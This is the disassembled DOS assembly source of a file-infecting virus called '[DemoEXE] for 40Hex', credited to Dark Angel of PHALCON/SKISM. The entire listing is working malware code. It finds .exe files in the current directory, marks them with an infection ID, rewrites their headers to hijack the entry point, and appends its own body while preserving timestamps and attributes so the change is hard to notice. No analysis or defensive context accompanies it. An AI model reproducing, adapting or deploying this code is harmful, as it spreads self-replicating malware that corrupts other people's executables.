DEMOEXE
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
id = 'DA'
startvirus:
call next
next: pop bp
sub bp,offset next
push ds
push es
push cs
pop ds
push cs
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
movsw
mov ah,1Ah
lea dx,[bp+newDTA]
int 21h
lea dx,[bp+exe_mask]
mov ah,4eh
mov cx,7
findfirstnext:
int 21h
jc done_infections
mov al,0h
call open
mov ah,3fh
lea dx,[bp+buffer]
mov cx,1Ah
int 21h
mov ah,3eh
int 21h
checkEXE: cmp word ptr [bp+buffer+10h],id
jnz infect_exe
find_next:
mov ah,4fh
jmp short findfirstnext
done_infections:
mov ah,1ah
mov dx,80h
pop es
pop ds
int 21h
mov ax,es
add ax,10h
add word ptr cs:[si+jmpsave+2],ax
add ax,word ptr cs:[si+stacksave+2]
cli
mov sp,word ptr cs:[si+stacksave]
mov ss,ax
sti
db 0eah
jmpsave dd ?
stacksave dd ?
jmpsave2 dd 0fff00000h
stacksave2 dd ?
creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0
virusname db '[DemoEXE] for 40Hex',0
infect_exe:
les ax, dword ptr [bp+buffer+14h]
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es
les ax, dword ptr [bp+buffer+0Eh]
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax
mov ax, word ptr [bp+buffer + 8]
mov cl, 4
shl ax, cl
xchg ax, bx
les ax, [bp+offset newDTA+26]
mov dx, es
push ax
push dx
sub ax, bx
sbb dx, 0
mov cx, 10h
div cx
mov word ptr [bp+buffer+14h], dx
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax
mov word ptr [bp+buffer+10h], id
pop dx
pop ax
add ax, heap-startvirus
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1
mov word ptr [bp+buffer+4], dx
mov word ptr [bp+buffer+2], ax
push cs
pop es
mov cx, 1ah
finishinfection:
push cx
xor cx,cx
call attributes
mov al,2
call open
mov ah,40h
lea dx,[bp+buffer]
pop cx
int 21h
mov ax,4202h
xor cx,cx
cwd
int 21h
mov ah,40h
lea dx,[bp+startvirus]
mov cx,heap-startvirus
int 21h
mov ax,5701h
mov cx,word ptr [bp+newDTA+16h]
mov dx,word ptr [bp+newDTA+18h]
int 21h
mov ah,3eh
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h]
call attributes
mo_infections: jmp find_next
open:
mov ah,3dh
lea dx,[bp+newDTA+30]
int 21h
xchg ax,bx
ret
attributes:
mov ax,4301h
lea dx,[bp+newDTA+30]
int 21h
ret
exe_mask db '*.exe',0
heap:
newDTA db 42 dup (?)
buffer db 1ah dup (?)
endheap:
end startvirus
